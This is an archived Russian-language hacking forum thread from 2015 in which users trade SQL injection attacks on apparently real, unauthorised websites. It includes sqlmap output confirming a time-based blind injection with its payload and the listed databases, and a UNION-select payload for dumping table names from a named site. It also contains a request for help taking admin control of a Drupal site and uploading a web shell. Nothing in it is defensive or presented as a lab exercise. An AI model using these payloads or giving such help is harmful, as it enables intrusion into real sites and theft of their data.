ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.10.2015, 10:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Код HTML:
HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать? |
|
|
|
23.10.2015, 13:32
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от R3hab
R3hab said:
↑
Код HTML:
HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать? sqlmap берет
Код:
Code:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
---
[12:26:48] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.6.0, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
Базы:
available databases [3]:
[*] elektroline
[*] information_schema
[*] test
|
|
|
23.10.2015, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
|
|
|
|
24.10.2015, 00:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
5139
Репутация:
0
|
|
|
|
|
|
24.10.2015, 00:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
11341
Репутация:
0
|
|
|
|
|
|
24.10.2015, 01:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
7285
Репутация:
0
|
|
Сообщение от xivi00
xivi00 said:
↑
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=(S ELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(CHAR( 95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105) ,CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97), 0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CO LLATIONS+GROUP+BY+x)a)
sqlmap как в нем таблици вытащить что то чар не пагет(
Код:
Code:
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+--
|
|
|
|
24.10.2015, 01:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
3893
Репутация:
0
|
|
Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
|
|
|
|
24.10.2015, 06:30
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
|
|
|
|
24.10.2015, 13:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Код HTML:
HTML:
http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*
как то можно использовать эту ошибку? |
|
|
|
24.10.2015, 21:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
3893
Репутация:
0
|
|
спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
